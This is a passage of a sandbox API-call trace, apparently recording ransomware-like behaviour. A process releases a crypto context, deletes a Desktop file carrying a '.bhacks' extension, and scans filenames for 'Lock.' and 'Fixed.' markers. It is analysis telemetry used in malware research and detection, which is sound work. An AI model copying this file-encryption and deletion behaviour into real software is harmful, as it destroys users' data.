lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0103.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0103.814] CryptReleaseContext (hProv=0x9becd0, dwFlags=0x0) returned 1 [0103.814] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.814] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.814] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.814] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.814] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.814] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.814] FreeLibrary (hLibModule=0x76390000) returned 1 [0103.814] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.814] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.814] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.814] CloseHandle (hObject=0x458) returned 1 [0103.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.817] CloseHandle (hObject=0x44c) returned 1 [0103.819] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.820] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.820] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0103.820] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0103.820] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/nYVw1n1XTh2-sApcS7w.mp4.bhacks", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\nYVw1n1XTh2-sApcS7w.mp4.bhacks", lpFilePart=0x8cedf4*="nYVw1n1XTh2-sApcS7w.mp4.bhacks") returned 0x36 [0103.820] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\nYVw1n1XTh2-sApcS7w.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\nyvw1n1xth2-sapcs7w.mp4.bhacks")) returned 0x20 [0103.820] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\nYVw1n1XTh2-sApcS7w.mp4.bhacks", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25362701, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x25362701, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2552c345, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xb5f0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="nYVw1n1XTh2-sApcS7w.mp4.bhacks", cAlternateFileName="NYVW1N~1.BHA")) returned 0x9a3b80 [0103.820] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\nYVw1n1XTh2-sApcS7w.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\nyvw1n1xth2-sapcs7w.mp4.bhacks")) returned 1 [0103.821] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25362701, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x25362701, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2552c345, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xb5f0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="nYVw1n1XTh2-sApcS7w.mp4.bhacks", cAlternateFileName="NYVW1N~1.BHA")) returned 0 [0103.821] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0103.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a752b8 | out: hHeap=0x2af0000) returned 1 [0103.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0103.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0103.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0103.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0103.822] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0103.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0103.822] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0103.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0103.822] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6648 [0103.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0103.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0103.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0103.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0103.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0103.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0103.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0103.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75588 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6648 | out: hHeap=0x2af0000) returned 1 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0103.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0103.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0103.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0103.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0103.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0103.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0103.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0103.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0103.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0103.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6e) returned 0x2a75d08 [0103.824] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/nYVw1n1XTh2-sApcS7w.mp4.bhacks", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\nYVw1n1XTh2-sApcS7w.mp4.bhacks", lpFilePart=0x8cf650*="nYVw1n1XTh2-sApcS7w.mp4.bhacks") returned 0x36 [0103.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75d08 | out: hHeap=0x2af0000) returned 1 [0103.824] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\nYVw1n1XTh2-sApcS7w.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\nyvw1n1xth2-sapcs7w.mp4.bhacks")) returned 0xffffffff [0103.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75588 | out: hHeap=0x2af0000) returned 1 [0103.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0103.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0103.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0103.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0103.824] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0103.824] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.824] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0103.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0103.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0103.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0103.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0103.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0103.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0103.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0103.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0103.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0103.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og9u_G4EHl49Tl.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g9u_G4EHl49Tl.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9u_G4EHl49Tl.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u_G4EHl49Tl.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_G4EHl49Tl.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G4EHl49Tl.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4EHl49Tl.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EHl49Tl.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hl49Tl.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l49Tl.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="49Tl.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9Tl.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tl.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0103.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0103.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0103.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0103.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0103.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0103.825] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0103.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0103.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0103.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0103.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0103.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0103.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0103.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0103.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0103.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0103.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0103.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0103.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0103.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0103.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0103.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0103.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x26) returned 0x2a69a00 [0103.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0103.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og9u_G4EHl49Tl.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g9u_G4EHl49Tl.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9u_G4EHl49Tl.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u_G4EHl49Tl.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_G4EHl49Tl.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G4EHl49Tl.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4EHl49Tl.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EHl49Tl.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hl49Tl.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l49Tl.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="49Tl.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9Tl.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tl.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0103.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6568 [0103.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0103.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6568 | out: hHeap=0x2af0000) returned 1 [0103.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0103.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0103.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0103.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0103.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0103.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0103.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0103.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0103.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0103.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0103.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0103.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0103.827] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0103.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0103.827] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0103.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0103.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0103.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0103.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f88 [0103.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0103.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0103.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0103.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 